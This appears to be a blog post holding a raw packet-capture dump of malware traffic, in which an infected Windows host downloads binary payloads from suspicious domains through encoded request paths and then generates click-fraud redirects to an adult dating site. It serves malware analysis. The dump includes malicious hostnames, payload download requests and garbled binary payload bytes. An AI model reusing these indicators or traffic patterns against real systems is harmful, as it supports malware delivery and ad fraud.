2014-12-31 21:42:12.279170 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [.], ack 368, win 64240, length 0
E..(…….!C……..P.G…;….P…a………
2014-12-31 21:42:12.917561 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 1:1356, ack 368, win 64240, length 1355
E..s……..C……..P.G…;….P….m..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:12 GMT
Content-Type: application/octet-stream
Content-Length: 116010
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Accept-Ranges: bytes
Content-Disposition: inline; filename=1436

?2.P`RurliPc..rh.PcRurhi.cRurhiPcRurhiPcRurhiPcRurhiPcRurhiP.Rurfv.mR.{.H.b..S<.9.r….”.?U. .>.&U..I”.<U..I.,.U…5M_xxLiPcRurhX..h….%……9…….
‘……;….4…S..9…….
&…;9.:….PcRurhiPcRurhiPcRurhiPcR%7hi.bWu..s.cRurhiPc.u}ibQeRu,hiP.PurliP=`urhyPcR.rhiP#RubhiPaRuvhiPeRurliPcRurhi@gRuvhiPcRuphi.cRerhyPcRubhi@cRurhi@cRurhiPcRur..Pc.urhiPgR.thiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcR.rh.RcRurhiPcRurhiPcRurhiPcRurhG$.*.rhi.>RurxiPc.urhmPcRurhiPcRurhipcR.\..1.3ur.{PcR.rhiDcRu.hiPcRurhiPcRur(iP#|….PcR..jiP.RurliPc$urhiPcRurhiPcR5rh.~.6.. iPcBtrh.RcRurhiPcRurhiPcRurhiP.Ru.F.#.1urh.VcRurliPkRur.iPcRurhiPcRurh)Pc.urhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurh<…….\l&^..e…a.e..{B…..c.=v8.%s..~..X.G=.(i.!Sur;?.V..0h..
2014-12-31 21:42:12.962207 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 1356:1453, ack 368, win 64240, length 97
E………
2014-12-31 21:42:14.075223 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [P.], seq 1109:1476, ack 36029, win 64240, length 367
E…..@…a…..C….F.P{.d.pmL.P…m…GET /ABsJAkgDB0REGlQaQxlWAAADR0VQUFRCGVYEBR1GRFFLXkJLVQcLT0IOEREoBC8bBg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:14.075379 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [.], ack 1476, win 64240, length 0
E..(.`….
.C……..P.FpmL.{.e.P………….
2014-12-31 21:42:14.723101 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 36029:36277, ack 1476, win 64240, length 248
E.. .s…. .C……..P.FpmL.{.e.P….y..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:14 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:14.804312 IP 192.168.138.158.49223 > 67.215.2.195.80: Flags [P.], seq 368:729, ack 116277, win 64240, length 361
E…..@…a…..C….G.P…….oP….g..GET /AwoVGwUGAEEOVxlXDlRTBgIDQERTV1YOVFcDHAJBRUhdVlxXVA1OQB4eEAAU HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:14.804411 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [.], ack 729, win 64240, length 0
E..(.w….
xC……..P.G…o…~P…./……..
2014-12-31 21:42:14.824979 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 36029:36277, ack 1476, win 64240, length 248
E.. .x…. .C……..P.FpmL.{.e.P….y..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:14 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:14.825096 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [.], ack 36277, win 63992, length 0
E..(..@…c…..C….F.P{.e.pmM.P………….
2014-12-31 21:42:15.355055 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 116277:117729, ack 729, win 64240, length 1452
E………..C……..P.G…o…~P…`]..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:15 GMT
Content-Type: application/octet-stream
Content-Length: 19011
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Accept-Ranges: bytes
Content-Disposition: inline; filename=1436
2014-12-31 21:42:16.024460 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [P.], seq 1476:1843, ack 36277, win 63992, length 367
E…..@…a…..C….F.P{.e.pmM.P….*..GET /ABsJAkgDB0REGlQaQxlWAAADR0VQUFRCGVYEBR1GRFFLXkJLVQcLT08OFA0PIgY1QQ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:16.024544 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [.], ack 1843, win 64240, length 0
E..(……
CC……..P.FpmM.{.giP………….
2014-12-31 21:42:17.665580 IP 67.215.2.195.80 > 192.168.138.158.49222: Flags [P.], seq 36277:37729, ack 1843, win 64240, length 1452
E……….aC……..P.FpmM.{.giP…t…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:17 GMT
Content-Type: application/octet-stream
Content-Length: 116010
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Accept-Ranges: bytes
Content-Disposition: inline; filename=1436

?2.P`RurliPc..rh.PcRurhi.cRurhiPcRurhiPcRurhiPcRurhiPcRurhiP.Rurfv.mR.{.H.b..S<.9.r….”.?U. .>.&U..I”.<U..I.,.U…5M_xxLiPcRurhX..h….%……9…….
‘……;….4…S..9…….
&…;9.:….PcRurhiPcRurhiPcRurhiPcR%7hi.bWu..s.cRurhiPc.u}ibQeRu,hiP.PurliP=`urhyPcR.rhiP#RubhiPaRuvhiPeRurliPcRurhi@gRuvhiPcRuphi.cRerhyPcRubhi@cRurhi@cRurhiPcRur..Pc.urhiPgR.thiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcR.rh.RcRurhiPcRurhiPcRurhiPcRurhG$.*.rhi.>RurxiPc.urhmPcRurhiPcRurhipcR.\..1.3ur.{PcR.rhiDcRu.hiPcRurhiPcRur(iP#|….PcR..jiP.RurliPc$urhiPcRurhiPcR5rh.~.6.. iPcBtrh.RcRurhiPcRurhiPcRurhiP.Ru.F.#.1urh.VcRurliPkRur.iPcRurhiPcRurh)Pc.urhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurhiPcRurh<…….\l&^..e…a.e..{B…..c.=v8.%s..~..X.G=.(i.!Sur;?.V..0h….%..a.v..2h.5.R.7d……`.E3 5r….7.r.t…u..iPc].4:f.5.z.=…y8.g..`..?x…a…f.%.z..f.-.z.%.
2014-12-31 21:42:18.763101 IP 192.168.138.158.49222 > 67.215.2.195.80: Flags [.], ack 152553, win 64240, length 0
E..(..@…b…..C….F.P{.gipo.<P….i……..
2014-12-31 21:42:18.771275 IP 192.168.138.158.49223 > 67.215.2.195.80: Flags [P.], seq 729:1096, ack 135553, win 64240, length 367
E…..@…a…..C….G.P…~….P….)..GET /ABsJAkgDB0REGlQaQxlWAAADR0VQUFRCGVYEBR1GRFFLXkJLVQcLT08OEREoBC8bBg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jkarbqs789vhnmqzn919nhm.ekay61.com
Connection: Keep-Alive
2014-12-31 21:42:18.771333 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [.], ack 1096, win 64240, length 0
E..(.]…. .C……..P.G……..P…Mt……..
2014-12-31 21:42:19.272154 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 135553:135801, ack 1096, win 64240, length 248
E.. .m……C……..P.G……..P…Z…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:19 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:19.374706 IP 67.215.2.195.80 > 192.168.138.158.49223: Flags [P.], seq 135553:135801, ack 1096, win 64240, length 248
E.. .q……C……..P.G……..P…Z…HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:19 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
X-Powered-By: PHP/5.4.35-0+deb7u2
Vary: Accept-Encoding
Content-Encoding: gzip

………………..
2014-12-31 21:42:19.374775 IP 192.168.138.158.49223 > 67.215.2.195.80: Flags [.], ack 135801, win 63992, length 0
E..(..@…b…..C….G.P……..P…Mt……..
2014-12-31 21:42:29.877240 IP 192.168.138.158.49224 > 67.215.2.195.80: Flags [S], seq 1960259095, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…b…..C….H.Pt……… .Y……………
2014-12-31 21:42:29.988075 IP 67.215.2.195.80 > 192.168.138.158.49224: Flags [S.], seq 3470477649, ack 1960259096, win 64240, options [mss 1460], length 0
E..,…….@C……..P.H..IQt…`………….
2014-12-31 21:42:29.988166 IP 192.168.138.158.49224 > 67.215.2.195.80: Flags [.], ack 1, win 64240, length 0
E..(..@…b…..C….H.Pt…..IRP….L……..
2014-12-31 21:42:29.988343 IP 192.168.138.158.49224 > 67.215.2.195.80: Flags [P.], seq 1:561, ack 1, win 64240, length 560
E..X..@…`…..C….H.Pt…..IRP…7…GET /get_ads.php?yy=1&aid=2&atr=exts&src=275 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 01naxtw68121x3lwjuw6z7p.escortbayanlar.pro
Connection: Keep-Alive
2014-12-31 21:42:30.541496 IP 67.215.2.195.80 > 192.168.138.158.49224: Flags [P.], seq 1:335, ack 561, win 64240, length 334
E..v……..C……..P.H..IRt.0HP…Y…HTTP/1.1 302 Found
Server: nginx/1.4.3
Date: Thu, 01 Jan 2015 01:42:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 2015 01:42:30 +0000
X-Frame-Options: DENY
Location: http://adultfriendfinder.com/go/p1011105.subexts
2014-12-31 21:42:30.589648 IP 67.215.2.195.80 > 192.168.138.158.49224: Flags [P.], seq 335:340, ack 561, win 64240, length 5
E..-…….*C……..P.H..J.t.0HP…_…0

.
2014-12-31 21:42:30.589715 IP 192.168.138.158.49224 > 67.215.2.195.80: Flags [.], ack 340, win 63901, length 0
E..(..@…b…..C….H.Pt.0H..J.P………….
2014-12-31 21:42:34.809493 IP 192.168.138.158.49225 > 208.88.180.72.80: Flags [S], seq 877620194, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…$……X.H.I.P4Ok……. ..c…………..
2014-12-31 21:42:34.902318 IP 208.88.180.72.80 > 192.168.138.158.49225: Flags [S.], seq 2943029486, ack 877620195, win 64240, options [mss 1460], length 0
E..,.D…….X.H…..P.I.k..4Ok.`………….
2014-12-31 21:42:34.902426 IP 192.168.138.158.49225 > 208.88.180.72.80: Flags [.], ack 1, win 64240, length 0
E..(..@…$……X.H.I.P4Ok..k..P………….
2014-12-31 21:42:34.902662 IP 192.168.138.158.49225 > 208.88.180.72.80: Flags [P.], seq 1:520, ack 1, win 64240, length 519
E../..@…”……X.H.I.P4Ok..k..P…<…GET /go/p1011105.subexts HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: adultfriendfinder.com
Connection: Keep-Alive
2014-12-31 21:42:34.902749 IP 208.88.180.72.80 > 192.168.138.158.49225: Flags [.], ack 520, win 64240, length 0
E..(.E…….X.H…..P.I.k..4Om.P………….
2014-12-31 21:42:35.273381 IP 208.88.180.72.80 > 192.168.138.158.49225: Flags [P.], seq 1:1110, ack 520, win 64240, length 1109
E..}.P…..B.X.H…..P.I.k..4Om.P…….HTTP/1.1 302 Found
Date: Thu, 01 Jan 2015 01:42:34 GMT
Server: Apache
X-PERF: 0.189873,0.049631,DB_20_0.0209290,CD_19_0.0051770,PK_2_0.0715360,CE_23_0.0426000
Location: http://adultfriendfinder.com/go/page/landing_page_68?nid=14&layout=qna&pid=p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
Set-Cookie: ALPO=106676411; path=/; domain=.adultfriendfinder.com; expires=Fri, 02-Jan-2015 01:42:35 GMT
Set-Cookie: click_id_time=960008297_2014-12-31 17:42:35; path=/; domain=.adultfriendfinder.com; expires=Sat, 31-Jan-2015 01:42:35 GMT
Set-Cookie: AB_TRACKING=2PhNkokiaeSDXFlH28j8YD; path=/; domain=.adultfriendfinder.com; expires=Sat, 31-Jan-2015 01:42:35 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 270
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

……….-.=O.0….

Share Button

One thought on “Unknown Adultfriendfinder Malware Loads Click Fraud Adware PCAP Traffic Sample

  1. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *